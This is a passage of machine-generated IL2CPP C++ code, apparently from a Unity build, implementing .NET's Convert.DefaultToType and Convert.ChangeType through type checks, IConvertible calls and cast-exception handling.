RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_141, L_144, /*hidden argument*/NULL); if (!L_145) { goto IL_01c7; } } { RuntimeObject* L_146 = ___value0; RuntimeObject* L_147 = ___provider2; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_148 = InterfaceFuncInvoker1< DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 , RuntimeObject* >::Invoke(14 /* System.DateTime System.IConvertible::ToDateTime(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_146, L_147); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_149 = L_148; RuntimeObject * L_150 = Box(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var, &L_149); return L_150; } IL_01c7: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_151 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_152 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_153 = ((int32_t)18); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_154 = (L_152)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_153)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_155 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_151, L_154, /*hidden argument*/NULL); if (!L_155) { goto IL_01df; } } { RuntimeObject* L_156 = ___value0; RuntimeObject* L_157 = ___provider2; String_t* L_158 = InterfaceFuncInvoker1< String_t*, RuntimeObject* >::Invoke(15 /* System.String System.IConvertible::ToString(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_156, L_157); return L_158; } IL_01df: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_159 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_160 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_161 = 1; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_162 = (L_160)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_161)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_163 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_159, L_162, /*hidden argument*/NULL); if (!L_163) { goto IL_01f0; } } { RuntimeObject* L_164 = ___value0; return L_164; } IL_01f0: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_165 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_166 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_EnumType_1(); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_167 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_165, L_166, /*hidden argument*/NULL); if (!L_167) { goto IL_0204; } } { RuntimeObject* L_168 = ___value0; return ((Enum_t2AF27C02B8653AE29442467390005ABC74D8F521 *)CastclassClass((RuntimeObject*)L_168, Enum_t2AF27C02B8653AE29442467390005ABC74D8F521_il2cpp_TypeInfo_var)); } IL_0204: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_169 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_170 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_171 = 2; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_172 = (L_170)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_171)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_173 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_169, L_172, /*hidden argument*/NULL); if (!L_173) { goto IL_0223; } } { String_t* L_174 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral55D1BE151653A5C241220EC0C5204A685F6D0FBA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_175 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_175, L_174, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_175, NULL, Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_RuntimeMethod_var); } IL_0223: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_176 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_177 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_178 = 0; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_179 = (L_177)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_178)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_180 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_176, L_179, /*hidden argument*/NULL); if (!L_180) { goto IL_0242; } } { String_t* L_181 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral07BC1266D48DC029301AB121DA798327931365C6, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_182 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_182, L_181, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_182, NULL, Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_RuntimeMethod_var); } IL_0242: { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_183 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_184 = L_183; RuntimeObject* L_185 = ___value0; Type_t * L_186 = Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60(L_185, /*hidden argument*/NULL); String_t* L_187 = VirtFuncInvoker0< String_t* >::Invoke(25 /* System.String System.Type::get_FullName() */, L_186); ArrayElementTypeCheck (L_184, L_187); (L_184)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)L_187); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_188 = L_184; Type_t * L_189 = ___targetType1; String_t* L_190 = VirtFuncInvoker0< String_t* >::Invoke(25 /* System.String System.Type::get_FullName() */, L_189); ArrayElementTypeCheck (L_188, L_190); (L_188)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)L_190); String_t* L_191 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_188, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_192 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_192, L_191, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_192, NULL, Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_RuntimeMethod_var); } } // System.Object System.Convert::ChangeType(System.Object,System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926 (RuntimeObject * ___value0, Type_t * ___conversionType1, RuntimeObject* ___provider2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_MetadataUsageId); s_Il2CppMethodInitialized = true; } RuntimeObject* V_0 = NULL; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * V_1 = NULL; { Type_t * L_0 = ___conversionType1; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); bool L_1 = Type_op_Equality_m7040622C9E1037EFC73E1F0EDB1DD241282BE3D8(L_0, (Type_t *)NULL, /*hidden argument*/NULL); if (!L_1) { goto IL_0014; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_2 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_2, _stringLiteral5D4EEE7520E3C4D7B6DAAA0FAF98E5446EEC12EF, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_RuntimeMethod_var); } IL_0014: { RuntimeObject * L_3 = ___value0; if (L_3) { goto IL_0031; } } { Type_t * L_4 = ___conversionType1; bool L_5 = Type_get_IsValueType_mDDCCBAE9B59A483CBC3E5C02E3D68CEBEB2E41A8(L_4, /*hidden argument*/NULL); if (!L_5) { goto IL_002f; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralE7A77DDE1DCF7766A8F2B41123A23E1C33F262A8, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_7 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_7, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_RuntimeMethod_var); } IL_002f: { return NULL; } IL_0031: { RuntimeObject * L_8 = ___value0; V_0 = ((RuntimeObject*)IsInst((RuntimeObject*)L_8, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)); RuntimeObject* L_9 = V_0; if (L_9) { goto IL_005b; } } { RuntimeObject * L_10 = ___value0; Type_t * L_11 = Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60(L_10, /*hidden argument*/NULL); Type_t * L_12 = ___conversionType1; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); bool L_13 = Type_op_Equality_m7040622C9E1037EFC73E1F0EDB1DD241282BE3D8(L_11, L_12, /*hidden argument*/NULL); if (!L_13) { goto IL_004b; } } { RuntimeObject * L_14 = ___value0; return L_14; } IL_004b: { String_t* L_15 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral8E235C85706AEC625982AEEA41C686B14E89F326, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_16 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_16, L_15, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_16, NULL, Convert_ChangeType_m4F879F3D17C11FA0B648C99C6D3C42DD33F40926_RuntimeMethod_var); } IL_005b: { Type_t * L_17 = ___conversionType1; V_1 = ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)IsInstClass((RuntimeObject*)L_17, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var)); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_18 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_19 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_20 = 3; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_21 = (L_19)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_20)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_22 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_18, L_21, /*hidden argument*/NULL); if (!L_22) { goto IL_007e; } } { RuntimeObject* L_23 = V_0; RuntimeObject* L_24 = ___provider2; bool L_25 = InterfaceFuncInvoker1< bool, RuntimeObject* >::Invoke(1 /* System.Boolean System.IConvertible::ToBoolean(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_23, L_24); bool L_26 = L_25; RuntimeObject * L_27 = Box(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_il2cpp_TypeInfo_var, &L_26); return L_27; } IL_007e: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_28 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_29 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_30 = 4; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_31 = (L_29)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_30)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_32 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_28, L_31, /*hidden argument*/NULL); if (!L_32) { goto IL_009a; } } { RuntimeObject* L_33 = V_0; RuntimeObject* L_34 = ___provider2; Il2CppChar L_35 = InterfaceFuncInvoker1< Il2CppChar, RuntimeObject* >::Invoke(2 /* System.Char System.IConvertible::ToChar(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_33, L_34); Il2CppChar L_36 = L_35; RuntimeObject * L_37 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_36); return L_37; } IL_009a: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_38 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_39 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_40 = 5; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_41 = (L_39)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_40)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_42 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_38, L_41, /*hidden argument*/NULL); if (!L_42) { goto IL_00b6; } } { RuntimeObject* L_43 = V_0; RuntimeObject* L_44 = ___provider2; int8_t L_45 = InterfaceFuncInvoker1< int8_t, RuntimeObject* >::Invoke(3 /* System.SByte System.IConvertible::ToSByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_43, L_44); int8_t L_46 = L_45; RuntimeObject * L_47 = Box(SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_il2cpp_TypeInfo_var, &L_46); return L_47; } IL_00b6: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_48 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_49 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_50 = 6; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_51 = (L_49)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_50)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_52 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_48, L_51, /*hidden argument*/NULL); if (!L_52) { goto IL_00d2; } } { RuntimeObject* L_53 = V_0; RuntimeObject* L_54 = ___provider2; uint8_t L_55 = InterfaceFuncInvoker1< uint8_t, RuntimeObject* >::Invoke(4 /* System.Byte System.IConvertible::ToByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_53, L_54); uint8_t L_56 = L_55; RuntimeObject * L_57 = Box(Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_il2cpp_TypeInfo_var, &L_56); return L_57; } IL_00d2: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_58 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_59 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_60 = 7; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_61 = (L_59)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_60)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_62 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_58, L_61, /*hidden argument*/NULL); if (!L_62) { goto IL_00ee; } } { RuntimeObject* L_63 = V_0; RuntimeObject* L_64 = ___provider2; int16_t L_65 = InterfaceFuncInvoker1< int16_t, RuntimeObject* >::Invoke(5 /* System.Int16 System.IConvertible::ToInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_63, L_64); int16_t L_66 = L_65; RuntimeObject * L_67 = Box(Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_il2cpp_TypeInfo_var, &L_66); return L_67; } IL_00ee: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_68 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_69 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_70 = 8; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_71 = (L_69)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_70)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_72 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_68, L_71, /*hidden argument*/NULL); if (!L_72) { goto IL_010a; } } { RuntimeObject* L_73 = V_0; RuntimeObject* L_74 = ___provider2; uint16_t L_75 = InterfaceFuncInvoker1< uint16_t, RuntimeObject* >::Invoke(6 /* System.UInt16 System.IConvertible::ToUInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_73, L_74); uint16_t L_76 = L_75; RuntimeObject * L_77 = Box(UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_il2cpp_TypeInfo_var, &L_76); return L_77; } IL_010a: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_78 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_79 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_80 = ((int32_t)9); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_81 = (L_79)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_80)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_82 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_78, L_81, /*hidden argument*/NULL); if (!L_82) { goto IL_0127; } } { RuntimeObject* L_83 = V_0; RuntimeObject* L_84 = ___provider2; int32_t L_85 = InterfaceFuncInvoker1< int32_t, RuntimeObject* >::Invoke(7 /* System.Int32 System.IConvertible::ToInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_83, L_84); int32_t L_86 = L_85; RuntimeObject * L_87 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_86); return L_87; } IL_0127: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_88 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_89 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_90 = ((int32_t)10); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_91 = (L_89)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_90)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_92 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_88, L_91, /*hidden argument*/NULL); if (!L_92) { goto IL_0144; } } { RuntimeObject* L_93 = V_0; RuntimeObject* L_94 = ___provider2; uint32_t L_95 = InterfaceFuncInvoker1< uint32_t, RuntimeObject* >::Invoke(8 /* System.UInt32 System.IConvertible::ToUInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_93, L_94); uint32_t L_96 = L_95; RuntimeObject * L_97 = Box(UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_il2cpp_TypeInfo_var, &L_96); return L_97; } IL_0144: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_98 = V_1; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_99 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_100 = ((int32_t)11); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_101 = (L_99)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_100)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_102 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_98, L_101, /*hidden 